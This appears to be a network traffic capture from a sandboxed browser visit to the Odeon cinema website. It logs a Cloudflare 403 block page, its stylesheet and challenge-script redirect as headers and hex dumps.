2024-12-10 09:06:50 UTC	665	OUT	GET / HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2024-12-10 09:06:51 UTC	596	IN	HTTP/1.1 403 Forbidden Date: Tue, 10 Dec 2024 09:06:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 10 Dec 2024 09:07:05 GMT Set-Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw; path=/; expires=Tue, 10-Dec-24 09:36:50 GMT; domain=.odeon.co.uk; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8efc14cc593153fc-ATL
2024-12-10 09:06:51 UTC	773	IN	Data Raw: 31 35 34 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 154d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 Data Ascii: 'cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f 6e 6c 69 6e 65 20 61 74 74 61 63 6b 73 2e 20 54 68 65 20 61 63 74 69 6f 6e 20 79 6f 75 20 6a 75 73 74 20 70 65 72 66 6f 72 6d 65 64 20 74 72 69 67 67 65 72 65 64 20 74 68 65 20 73 65 63 75 72 69 74 79 20 73 6f 6c 75 74 69 6f 6e 2e 20 54 68 65 72 65 20 61 72 65 Data Ascii: locked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e Data Ascii: lass="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">89.187.171.165</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>
2024-12-10 09:06:51 UTC	581	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f 6e 65 27 3b 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: etElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChi
2024-12-10 09:06:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:51 UTC	731	OUT	GET /cdn-cgi/styles/cf.errors.css HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.odeon.co.uk/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:51 UTC	411	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 09:06:51 GMT Content-Type: text/css Content-Length: 24051 Connection: close Last-Modified: Thu, 05 Dec 2024 16:15:40 GMT ETag: "6751d1ac-5df3" Server: cloudflare CF-RAY: 8efc14d10aa2bfc7-ATL X-Frame-Options: DENY X-Content-Type-Options: nosniff Expires: Tue, 10 Dec 2024 11:06:51 GMT Cache-Control: max-age=7200 Cache-Control: public Accept-Ranges: bytes
2024-12-10 09:06:51 UTC	958	IN	Data Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70 Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65 Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23 Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
2024-12-10 09:06:51 UTC	1369	IN	Data Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:52 UTC	700	OUT	GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:52 UTC	344	IN	HTTP/1.1 302 Found Date: Tue, 10 Dec 2024 09:06:52 GMT Content-Length: 0 Connection: close location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js? cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public access-control-allow-origin: * Server: cloudflare CF-RAY: 8efc14d58fae7bb2-ATL

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:52 UTC	818	OUT	GET /cdn-cgi/images/browser-bar.png?1376755637 HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.odeon.co.uk/cdn-cgi/styles/cf.errors.css Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:52 UTC	409	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 09:06:52 GMT Content-Type: image/png Content-Length: 715 Connection: close Last-Modified: Thu, 05 Dec 2024 16:15:40 GMT ETag: "6751d1ac-2cb" Server: cloudflare CF-RAY: 8efc14d58b1bbd32-ATL X-Frame-Options: DENY X-Content-Type-Options: nosniff Expires: Tue, 10 Dec 2024 11:06:52 GMT Cache-Control: max-age=7200 Cache-Control: public Accept-Ranges: bytes
